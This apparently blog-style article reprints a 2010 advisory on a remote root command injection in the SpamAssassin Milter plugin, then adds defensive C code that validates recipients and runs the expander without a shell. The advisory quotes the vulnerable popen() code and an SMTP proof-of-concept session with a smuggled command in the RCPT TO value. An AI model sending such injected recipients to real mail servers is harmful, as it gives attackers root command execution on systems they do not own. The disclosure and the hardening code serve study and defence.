Apache Spamassassin Milter Plugin Remote Root Command Execution

SpamAssassin is by far the most widely used anti-spam method among web farms worldwide, as it integrates perfectly with Apache and is open source.

Today Exploit-DB published a vulnerability discovered by Kingcope that allows remote execution of malicious code without the system administrator's knowledge.

The exploit can only be used if the Spamassassin Milter plugin is also installed; this plugin allows advanced customization of SpamAssassin's base filters.

The malicious code allows any command to be executed as the root user and must be placed in the "RCPT TO" field, i.e. the field that normally holds the recipient's e-mail address.

Here, finally, is the detailed exploit:

# Title: Apache Spamassassin Milter Plugin Remote Root Command Execution
# EDB-ID: 11662
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Kingcope
# Published: 2010-03-09
# Verified: yes
Description: The Spamassassin Milter plugin suffers from a remote root command execution vulnerability. Full exploit details provided.
Author: Kingcope

Spamassassin Milter Plugin Remote Root Zeroday (BTW zerodays lurk in the
shadows not HERE)
aka the postfix_joker advisory

Logic fuckup?

March 07 2010 // if you read this 10 years later you are definitely
seeking the nice 0days!

Greetz fly out to alex,andi,adize

Apache Spamassassin
SpamAssassin is a mail filter which attempts to identify spam using
a variety of mechanisms including text analysis, Bayesian filtering,
DNS blocklists, and collaborative filtering databases.

SpamAssassin is a project of the Apache Software Foundation (ASF).

What is Postfix? It is Wietse Venema's mailer that started life at IBM
research as an alternative to the widely-used Sendmail program.
Postfix attempts to be fast, easy to administer, and secure.
The outside has a definite Sendmail-ish flavor, but the inside is
completely different.

Spamassassin Milter
A little plugin for the Sendmail Milter (Mail Filter) library
that pipes all incoming mail (including things received by rmail/UUCP)
through SpamAssassin, a highly customizable spam filter.

Remote Code Execution Vulnerability

The Spamassassin Milter Plugin can be tricked into executing any command
as the root user remotely.
If spamass-milter is run with the expand flag (-x option) it runs a
popen() including the attacker-supplied recipient (RCPT TO).

From spamass-milter-0.3.1 (-latest) Line 820:

// Gets called once for each recipient
// stores the first recipient in the spamassassin object and
// stores all addresses and the number thereof (some redundancy)

mlfi_envrcpt(SMFICTX* ctx, char** envrcpt)
{
    struct context *sctx = (struct context*)smfi_getpriv(ctx);
    SpamAssassin* assassin = sctx->assassin;
    FILE *p;
#if defined(__FreeBSD__)
    int rv;
#endif

    debug(D_FUNC, "mlfi_envrcpt: enter");

    if (flag_expand)
    {
        /* open a pipe to sendmail so we can do address expansion */

        char buf[1024];
        char *fmt="%s -bv \"%s\" 2>&1";

#if defined(HAVE_SNPRINTF)
        snprintf(buf, sizeof(buf)-1, fmt, SENDMAIL, envrcpt[0]);
#else
        /* XXX possible buffer overflow here // is this a joke ?! */
        sprintf(buf, fmt, SENDMAIL, envrcpt[0]);
#endif

        debug(D_RCPT, "calling %s", buf);

#if defined(__FreeBSD__) /* popen bug - see PR bin/50770 */
        rv = pthread_mutex_lock(&popen_mutex);
        if (rv)
            debug(D_ALWAYS, "Could not lock popen mutex: %s", strerror(rv));
#endif

        p = popen(buf, "r");                /* [1] */
        if (!p)
            debug(D_RCPT, "popen failed(%s).  Will not expand aliases", strerror(errno));
        /* remainder of the function omitted in the advisory */

[1] the vulnerable popen() call.

Remote Root Exploit PoC through postfix

$ nc localhost 25
220 ownthabox ESMTP Postfix (Ubuntu)
mail from: [email protected]
250 2.1.0 Ok
rcpt to: root+:"|touch /tmp/foo"
250 2.1.5 Ok

$ ls -la /tmp/foo
-rw-r--r-- 1 root root 0 2010-03-07 19:46 /tmp/foo
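The listing above pastes envrcpt[0] into a shell command line and hands it to popen(); the PoC shows that one `"` and one `|` in the recipient are enough to break out of the quoting. The following C program is an added example, not code from spamass-milter, Postfix or the advisory. It shows the shape a defender would want for the same step: the recipient is checked against a conservative character allowlist, and the expander is invoked through fork()/execv() with an argv array, so no shell ever parses the address even if validation were bypassed. The expander path (/bin/echo stands in for sendmail so the argument handling is visible), the function names and the sample recipient are assumptions of this example.

```c
/* Added example (not spamass-milter or advisory code): recipient expansion
 * without a shell. Layer 1 rejects recipients carrying shell metacharacters;
 * layer 2 runs the expander via fork()/execv() with an argv array, so even a
 * recipient that slips past validation is never parsed by /bin/sh.
 * The expander path is caller-supplied; /bin/echo stands in for sendmail. */
#include <ctype.h>
#include <errno.h>
#include <stdio.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

/* Conservative allowlist: alphanumerics plus . _ - + = @ . Quoted local-parts
 * are legal in SMTP but refused here, since quoting is exactly what failed. */
static int rcpt_char_ok(unsigned char c)
{
    return isalnum(c) || (c != '\0' && strchr("._-+=@", c) != NULL);
}

/* 1 if rcpt (optionally wrapped in <>) is non-empty, allowlisted and has at
 * most one '@' with non-empty sides; 0 otherwise. */
int rcpt_is_safe(const char *rcpt)
{
    size_t len = strlen(rcpt);
    if (len >= 2 && rcpt[0] == '<' && rcpt[len - 1] == '>') {
        rcpt++;
        len -= 2;
    }
    if (len == 0 || len > 254)
        return 0;
    int at = -1;
    for (size_t i = 0; i < len; i++) {
        if (!rcpt_char_ok((unsigned char)rcpt[i]))
            return 0;
        if (rcpt[i] == '@') {
            if (at != -1)
                return 0;               /* a second '@' */
            at = (int)i;
        }
    }
    return at == -1 || (at > 0 && (size_t)at < len - 1);
}

/* Runs "prog -bv rcpt" with stderr folded into stdout (the original's 2>&1)
 * and stores the output in out. rcpt is one argv element: quotes, pipes and
 * spaces arrive as literal bytes. Returns 0 on success, -1 on failure. */
int run_expander_noshell(const char *prog, const char *rcpt, char *out, size_t outlen)
{
    int fds[2];
    if (outlen == 0 || pipe(fds) != 0)
        return -1;
    pid_t pid = fork();
    if (pid < 0) {
        close(fds[0]); close(fds[1]);
        return -1;
    }
    if (pid == 0) {                     /* child: wire the pipe, then exec */
        dup2(fds[1], STDOUT_FILENO);
        dup2(fds[1], STDERR_FILENO);
        close(fds[0]); close(fds[1]);
        char *const argv[] = { (char *)prog, "-bv", (char *)rcpt, NULL };
        execv(prog, argv);
        _exit(127);                     /* exec failed */
    }
    close(fds[1]);
    size_t used = 0;
    ssize_t n;
    while (used + 1 < outlen && (n = read(fds[0], out + used, outlen - 1 - used)) > 0)
        used += (size_t)n;
    out[used] = '\0';
    char discard[256];                  /* drain so the child never blocks */
    while (read(fds[0], discard, sizeof discard) > 0)
        ;
    close(fds[0]);
    int status;
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status) || WEXITSTATUS(status) == 127)
        return -1;
    return 0;
}

/* The hardened replacement for the popen() call: validate, then exec. */
int expand_address(const char *prog, const char *rcpt, char *out, size_t outlen)
{
    if (!rcpt_is_safe(rcpt)) {
        errno = EINVAL;
        return -1;
    }
    return run_expander_noshell(prog, rcpt, out, outlen);
}

int main(void)
{
    const char *poc = "root+:\"|touch /tmp/foo\"";   /* recipient from the PoC above */
    char out[512];
    printf("rcpt_is_safe(poc) = %d, rcpt_is_safe(user@example.com) = %d\n",
           rcpt_is_safe(poc), rcpt_is_safe("user@example.com"));
    if (run_expander_noshell("/bin/echo", poc, out, sizeof out) == 0)
        printf("argv reached the program literally: %s", out);
    if (expand_address("/bin/echo", poc, out, sizeof out) < 0)
        printf("expand_address rejected the PoC recipient: %s\n", strerror(errno));
    return 0;
}
```

Run against the PoC recipient, run_expander_noshell() shows echo receiving `-bv root+:"|touch /tmp/foo"` as two literal arguments, with nothing executed, while expand_address() refuses the address outright with EINVAL. The two layers are deliberately independent: validation gives an early, loggable rejection at RCPT time, and the exec-without-shell path means a future validation bug does not reopen the command injection.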